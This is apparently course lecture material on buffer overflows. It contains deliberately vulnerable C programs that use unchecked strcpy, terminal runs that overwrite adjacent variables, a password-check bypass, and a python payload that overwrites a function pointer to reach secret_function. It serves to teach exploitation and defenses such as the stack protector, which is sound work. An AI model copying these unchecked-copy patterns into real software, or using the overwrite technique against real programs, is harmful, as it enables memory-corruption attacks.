Buffer overflow

We have mentioned that program exploitation refers to techniques that allow us to “make a program do something unexpected and not planned”. How is this possible?

Programs are complex and it is hard to foresee all possible situations;
Programming errors can be exploited to obtain unexpected behaviour;
When a program is extended with new functionality, the extension may introduce new vulnerabilities, since it adds behaviours that were not anticipated in the original design.

In general, code does not always do only what the programmer had in mind …

Example 1: off-by-one

An ‘off-by-one’ bug was discovered in OpenSSH: the code contained the check

if (id < 0 || id > channel_alloc) {

instead of

if (id < 0 || id >= channel_alloc) {

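This code checks that a channel id is in the expected range. With the buggy comparison, an id equal to channel_alloc was accepted, so the program could access a memory cell one position past the last valid channel (an overflow of the kind we study in this class). Exploiting this, an attacker could obtain root privileges.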

Example 2: path traversal

The Microsoft IIS web server checked file names for the presence of ‘\’ to prevent ‘path traversals’ into disallowed directories. When the server was extended to support Unicode, the developers forgot to check for %5c, which corresponds to ‘\’. Since the translation from Unicode happened after the backslash check, ‘path traversal’ attacks were possible.

A buffer overflow occurs when a program writes past the boundary of a buffer and overwrites adjacent memory. This anomaly is frequent in C programs: the C language leaves to the programmer the responsibility of preserving data integrity, and there are no run-time checks that data written to a variable stay within the memory allocated for it. This produces very fast programs, but run-time errors such as overflows are possible.

Example (Overwriting variables)

The following program allocates an integer variable value and two buffers of size 8, buffer1 and buffer2. It prints the location and content of each variable using %p, %s and %d (plus %08x for hexadecimal format). Then the first command-line argument is copied into buffer1 with strcpy, with no check on its length. The copy goes beyond the boundaries of buffer1 whenever the argument has 8 or more characters, since the terminating zero byte must be stored too. The idea is to observe what happens: to this purpose the program prints the location and content of the three variables again.

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
  int value = 5;
  char buffer1[8], buffer2[8]; // buffers of size 8

  strcpy(buffer1, "one"); // copy "one" in the first buffer
  strcpy(buffer2, "two"); // copy "two" in the second buffer

  // show location and content of buffers and of variable 'value'
  printf("[BEFORE] buffer2 is at location %p and contains %s\n",buffer2, buffer2);
  printf("[BEFORE] buffer1 is at location %p and contains %s\n",buffer1, buffer1);
  printf("[BEFORE] value is at location %p and contains %d 0x%08x\n",&value, value, value);

  if (argc >= 2)
    // copy first argument into buffer1 (no check on length!!)
    strcpy(buffer1, argv[1]); 

  // show again location and content to see what has happened
  printf("[AFTER] buffer2 is at location %p and contains %s\n",buffer2, buffer2);
  printf("[AFTER] buffer1 is at location %p and contains %s\n",buffer1, buffer1);
  printf("[AFTER] value is at location %p and contains %d 0x%08x\n",&value, value,value);
}

Try to execute the program passing a string of gradually increasing size. For example: ‘A’, ‘AA’, ‘AAA’, and so on.

Observe the overflow in the output.

With 7 chars there is no overflow and only buffer1 is modified:

r1x@testbed ~/Overflow $ ./overflow AAAAAAA
[BEFORE] buffer2 is at location 0xbffff3b4 and contains two
[BEFORE] buffer1 is at location 0xbffff3ac and contains one
[BEFORE] value is at location 0xbffff3a8 and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3b4 and contains two
[AFTER] buffer1 is at location 0xbffff3ac and contains AAAAAAA
[AFTER] value is at location 0xbffff3a8 and contains 5 0x00000005

With 8 chars the zero byte terminating the string overwrites the first byte of buffer2, and the string two disappears:

r1x@testbed ~/Overflow $ ./overflow AAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3b4 and contains two
[BEFORE] buffer1 is at location 0xbffff3ac and contains one
[BEFORE] value is at location 0xbffff3a8 and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3b4 and contains 
[AFTER] buffer1 is at location 0xbffff3ac and contains AAAAAAAA
[AFTER] value is at location 0xbffff3a8 and contains 5 0x00000005

With 8 more chars we fill buffer2. Notice that buffer1 seems to contain 16 chars even if it is just 8 bytes long (in fact half of it is stored over buffer2):

r1x@testbed ~/Overflow $ ./overflow AAAAAAAAAAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3b4 and contains two
[BEFORE] buffer1 is at location 0xbffff3ac and contains one
[BEFORE] value is at location 0xbffff3a8 and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3b4 and contains AAAAAAAA
[AFTER] buffer1 is at location 0xbffff3ac and contains AAAAAAAAAAAAAAAA
[AFTER] value is at location 0xbffff3a8 and contains 5 0x00000005

Adding one more character pushes the overflow one byte further beyond buffer2. This time the corruption is detected and the program is terminated (thanks to a protection that we will study in detail):

r1x@testbed ~/Overflow $ ./overflow AAAAAAAAAAAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3b4 and contains two
[BEFORE] buffer1 is at location 0xbffff3ac and contains one
[BEFORE] value is at location 0xbffff3a8 and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3b4 and contains AAAAAAAAA
[AFTER] buffer1 is at location 0xbffff3ac and contains AAAAAAAAAAAAAAAAA
[AFTER] value is at location 0xbffff3a8 and contains 5 0x00000005
*** stack smashing detected ***: ./overflow terminated
.....

Try to compile the program with option -fno-stack-protector and observe the difference. This option disables protection against overflows on the stack (see below).

r1x@testbed ~/Overflow $ ./overflow AAAAAAA
[BEFORE] buffer2 is at location 0xbffff3ac and contains two
[BEFORE] buffer1 is at location 0xbffff3b4 and contains one
[BEFORE] value is at location 0xbffff3bc and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3ac and contains two
[AFTER] buffer1 is at location 0xbffff3b4 and contains AAAAAAA
[AFTER] value is at location 0xbffff3bc and contains 5 0x00000005
r1x@testbed ~/Overflow $ ./overflow AAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3ac and contains two
[BEFORE] buffer1 is at location 0xbffff3b4 and contains one
[BEFORE] value is at location 0xbffff3bc and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3ac and contains two
[AFTER] buffer1 is at location 0xbffff3b4 and contains AAAAAAAA
[AFTER] value is at location 0xbffff3bc and contains 0 0x00000000
r1x@testbed ~/Overflow $ ./overflow AAAAAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3ac and contains two
[BEFORE] buffer1 is at location 0xbffff3b4 and contains one
[BEFORE] value is at location 0xbffff3bc and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3ac and contains two
[AFTER] buffer1 is at location 0xbffff3b4 and contains AAAAAAAAAAA
[AFTER] value is at location 0xbffff3bc and contains 4276545 0x00414141
r1x@testbed ~/Overflow $ ./overflow AAAAAAAAAAAA
[BEFORE] buffer2 is at location 0xbffff3ac and contains two
[BEFORE] buffer1 is at location 0xbffff3b4 and contains one
[BEFORE] value is at location 0xbffff3bc and contains 5 0x00000005
[AFTER] buffer2 is at location 0xbffff3ac and contains two
[AFTER] buffer1 is at location 0xbffff3b4 and contains AAAAAAAAAAAA
[AFTER] value is at location 0xbffff3bc and contains 1094795585 0x41414141
Segmentation fault

We notice that this time the overflow affects value instead of buffer2. With 7 chars there is no overflow. With 8 chars value becomes 0, because the string terminator overwrites the least significant byte of the integer, which is stored first in memory (little endianness). With 3 more chars (11 in total) the bytes 0x41 fill the three least significant bytes of the integer, i.e., the right-hand part of its hexadecimal value (again little endianness). With one more char (12 in total) value is completely overwritten and the zero byte is written past it, corrupting the adjacent stack data and triggering a segmentation fault.

To understand what happens in the above example it is good to recall how programs are mapped into memory:

Without stack protector, variables typically appear on the stack as if they had been pushed in declaration order, i.e., at decreasing addresses: buffer2 is at the lowest address, followed by buffer1 and then value. Thus, when an overflow on buffer1 occurs, it overwrites value but not buffer2.

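The stack protector rearranges the position of variables. With -fstack-protector (which is usually enabled by default) the compiler puts value before any array, i.e., at a lower address, so that it cannot be overwritten by overflows. In this specific example it also swaps the relative position of the two buffers, but this may vary depending on the compiler and on the alignment of variables on the stack. In the runs above, with the protector value is at 0xbffff3a8, buffer1 at 0xbffff3ac and buffer2 at 0xbffff3b4, while without it buffer2 is at 0xbffff3ac, buffer1 at 0xbffff3b4 and value at 0xbffff3bc. The following picture illustrates: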

Now that you have a better understanding of the relative position of variables you can rerun the example to observe how values are overwritten.

A first exploit: changing program flow

Overwriting variables is critical in itself, and sometimes it can cause interesting changes in the program flow. The next example shows how this can happen and how variable rearrangement may prevent the attack.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Check password
int check(char *pwd) {
	int auth_flag = 0; // flag is false, initially
	char pwd_buffer[16];
	
	// password is copied into a local buffer
	strcpy(pwd_buffer, pwd);
	
	if (strcmp(pwd_buffer, "itisme") == 0 )
		auth_flag = 1;
	
	return auth_flag;
}

int main(int argc, char *argv[]) {
	if (argc < 2){
		printf("Insert a Password!\n");
		exit(1);
	}
	if (check(argv[1]))
		printf("AUTHENTICATED!\n");
	else
		printf("ACCESS DENIED!\n");
}

We compile the program with no stack protector (option -fno-stack-protector) and we experiment with inputs of increasing size:

testbed$ gcc -fno-stack-protector pwdcheck.c -o pwdcheck
testbed$ ./pwdcheck ciao
ACCESS DENIED!
testbed$ ./pwdcheck itisme
AUTHENTICATED!
testbed$ ./pwdcheck AAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAAAAAAAA
ACCESS DENIED!
testbed$ ./pwdcheck AAAAAAAAAAAAAAAAA
AUTHENTICATED!
testbed$

What is happening here? As before, a string longer than the buffer causes an overflow, and the next variable in memory is overwritten. In particular, auth_flag becomes different from 0, which in C means ‘true’: with the layout observed here, 16 chars fill pwd_buffer and the 17th lands on the first byte of auth_flag. Function check(argv[1]) then returns true and the user is authenticated.

Let us see with gdb what is going on on the stack:

Exercise

Enable the stack protector and observe that the attack is prevented. Notice the special message printed by the program when a long input is given. The overflow does not overwrite auth_flag because of the rearrangement discussed above. Moreover, the program detects the overflow. We will discuss how this is possible during the next class.

More examples

Simple overflow

The following code illustrates a simple overflow on static (global) variables. This is discussed in the slides and is not prevented by the stack protector, which does not rearrange static variables:

#include <stdio.h>
#include <string.h>

int value;
char buffer1[8], buffer2[8]; // buffers of size 8

void show(char *s) {
	printf("[%s] buffer2 is at location %p and contains %s\n",s, buffer2, buffer2);
	printf("[%s] buffer1 is at location %p and contains %s\n",s, buffer1, buffer1);
	printf("[%s] value is at location %p and contains %d 0x%08x\n",s, &value, value, value);
}
int main(int argc, char *argv[]) {
	value=5;
	strcpy(buffer1, "one"); // copy "one" in the first buffer
	strcpy(buffer2, "two"); // copy "two" in the second buffer

	// show location and content of buffers and of variable 'value'
	show("BEFORE");

	if (argc >= 2)
		// copy first argument into buffer2 (no check on length!!)
		strcpy(buffer2, argv[1]); 

	// show again location and content to see what has happened
	show("AFTER");
}

Its stack counterpart is:

#include <stdio.h>
#include <string.h>

void show(char *s, char *buffer1, char *buffer2, int *value) {
	printf("[%s] buffer2 is at location %p and contains %s\n",s, buffer2, buffer2);
	printf("[%s] buffer1 is at location %p and contains %s\n",s, buffer1, buffer1);
	printf("[%s] value is at location %p and contains %d 0x%08x\n",s, value, *value, *value);
}
int main(int argc, char *argv[]) {
	int value;
	char buffer1[8], buffer2[8]; // buffers of size 8

	value=5;
	strcpy(buffer1, "one"); // copy "one" in the first buffer
	strcpy(buffer2, "two"); // copy "two" in the second buffer

	// show location and content of buffers and of variable 'value'
	show("BEFORE",buffer1,buffer2,&value);

	if (argc >= 2)
		// copy first argument into buffer2 (no check on length!!)
		strcpy(buffer2, argv[1]); 

	// show again location and content to see what has happened
	show("AFTER",buffer1,buffer2,&value);
}

Here value is protected by default through the stack protector. This is the same as the example discussed above in the notes, except that the copy is done on buffer2 instead of buffer1.

Password checking with static variables

This is the same as the password checking example discussed above, but the buffer and the flag are static. The overflow is possible independently of the stack protector.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
char buffer[16];
int flag; 

// Check password
void check(char *pwd) {

	// password is copied into a global buffer
	strcpy(buffer, pwd); // possible overflow!!!
	
	if (strcmp(buffer, "itisme") == 0 )
		flag = 1;
}
 
int main(int argc, char *argv[]) {
	if (argc < 2){
		printf("Insert a Password!\n");
		exit(1);
	}
	flag=0; // false
	check(argv[1]); // check password
	if (flag)
		printf("AUTHENTICATED!\n");
	else
		printf("ACCESS DENIED!\n");
}

Overflow of a function pointer

This is the example discussed in the slides. A buffer overflow can overwrite a function address that is invoked by the program. This allows for jumping to arbitrary code in the program:

#include <stdio.h>
#include <string.h>
typedef struct element {
	char buffer[16];
	void (*process)(char *);
} element_t;

void secret_function() {
	printf("Will never reach this function!\n");
}

void show_element(char *s) {
	printf("%s\n",s);
}

int main(int argc, char *argv[]) {
	element_t e;

	e.process=show_element;
	if (argc >= 2)
		// copy first argument into buffer (no check on length!!)
		strcpy(e.buffer, argv[1]); 
	e.process(e.buffer);

}

It is possible to jump to secret_function by first looking up its address and then injecting it (in little-endian byte order) after 16 A’s, so as to overwrite the process pointer:

r1x@testbed ~/Overflow $ objdump -D overflow-struct  | grep secret
0804849a <secret_function>:
r1x@testbed ~/Overflow $ ./overflow-struct $( python -c "print('A'*16 + '\x9a\x84\x04\x08')"  )
Will never reach this function!
r1x@testbed ~/Overflow $ ./overflow-struct $( python3 -c "import sys;sys.stdout.buffer.write(b'A'*16 + b'\x9a\x84\x04\x08')"  )
Will never reach this function!

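Notice that in python3 it is necessary to use sys.stdout.buffer.write to write raw bytes: print would encode the string as text (typically UTF-8), so characters such as \x9a would not be emitted as single bytes.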